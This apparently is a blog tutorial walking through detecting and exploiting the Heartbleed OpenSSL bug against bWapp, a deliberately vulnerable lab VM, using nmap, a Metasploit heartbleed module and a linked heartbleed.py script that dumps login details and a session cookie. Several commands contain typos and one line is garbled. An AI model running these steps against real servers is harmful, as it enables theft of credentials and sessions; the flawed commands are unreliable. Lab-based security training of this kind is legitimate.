Heartbleed Discovery and Exploit

Add a comment

Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014.

Today we will discover how to detect the vulnerability and then demonstrate how to exploit that vulnerability. Currently this vulnerability only exploits version 1.0.1 of the OpenSSL library, so if you are running this version, update.

$199 ENROLLS YOU INTO OUR SELF PACED COURSE – LFS264 – OPNFV FUNDAMENTALS!

register

The application we will be exploiting for this example will be bWapp, (https://sourceforge.net/projects/bwap…) we have used this before in previous tutorials. It is an intentionally vulnerable web application that we will take advantage of.

heart1

Once you have installed the bWapp application virtual machine and start it up. So firstly we will need to do a vulnerability scan on the web server. so let’s grab the IP of the web app, in our case it’s 192.168.1.105. Your own IP may be different depending on what DHCP assigns it.

Once you are logged in you need to choose Heartbleed Vulnerability from the drop down menu and press Hack.

heart2

This will bring us to the Heartbleed vulnerability page on the web app. And right off the bat it gives a hint into how to exploit the web page. We can see that the logon port is 8443.

heart3

We will also provide the attack script needed to exploit this vulnerability (https://github.com/ctfs/write-ups-201…), so you will need to download the heartbleed.py file.

heart4

So once you are all set up the last thing we will need is our attacking machine. For this tutorial we ar using ParrotOS (https://parrotlinux.org/).

So firstly we need to do a vulnerability scan, so open up a command terminal and start an nmap scan.

sudo namp -sV -A 192.168.1.1.5

This will tell us that port 8443 is open and accepting connections. While that is scanning let’s go to port 8443 in our web browser. In our case the URL will be the following.

https://192.168.1.105:8443

ENROLL TODAY IN THE SELF PACED COURSE – LFS263 – ONAP FUNDAMENTALS FOR $199!

register

Once you open that we can take a look at the SSL certificate running on the page.

heart5

As we can see the certificate is not secure, so the connection is not secure. So our script should work on this web page. So let’s run the script. Again we will use nmap.

sudo namp -p 8443 --script ssl-heartbleed 192.168.1.105

The p flag denotes the port number and we will use the script flag to see if the web page is vulnerable to Heartbleed.

heart6

So the nmap scan reveals the the web page is indeed vulnerable to Heartbleed and the risk factor is High. It also gives us the version of OpenSSL which is 1.0.1 which we mentioned earlier.

To exploit this vulnerability we will need to start Metasploit.

msfconsoleopenSSL payload.

heart7

Once you are set up we can go ahead and set some parameters. So lets search for the OpenSSL module.

search openssl_heartbleed

heart8

So this is the module we will be using. So next we need to tell Metasploit to use this module for our exploit.

$299 REGISTERS YOU FOR OUR NEWEST SELF PACED COURSE! LFD201 – INTRODUCTION TO OPEN SOURCE DEVELOPMENT, GIT, AND LINUX!

register

use auxiliary/scanner/ssl/openssls_heartbleed

heart9

Next we need to set some parameters. Because as we can see above the RHOSTS setting has no value, so let’s give it our attacking machine IP. Also the port 443 is set by default, so we need to change that to 8443.

set RHOSTS 192.168.1.105

set RPORT 8443

show info

The show info command will confirm we have set everything up correctly.

heart10

Next we are going to run a vulnerability scan from within the Metasploit framework.

set action SCAN

run

heart11

This also confirms that certificate is vulnerable to this exploit, perfect. As an attacker it is always nice to test these things as much as possible to cement our suspicions.

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!    $299 now!!

register

Next we want to run our hearbleed.py script against the web app and what it will do is dump the hex values of the web page on screen for us.

python ./hearbleed.py 192.168.1.105

heart12

As we can see, there’s logon details for a user and also the PHP Session cookie. We think it was named Heartbleed because of the dump resembling a bleeding heart 🙂

Thanks for reading guys and don’t forget to like this post, comment and of course, subscribe for more posts like this!!

QuBits 2020-02-01

banner2

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.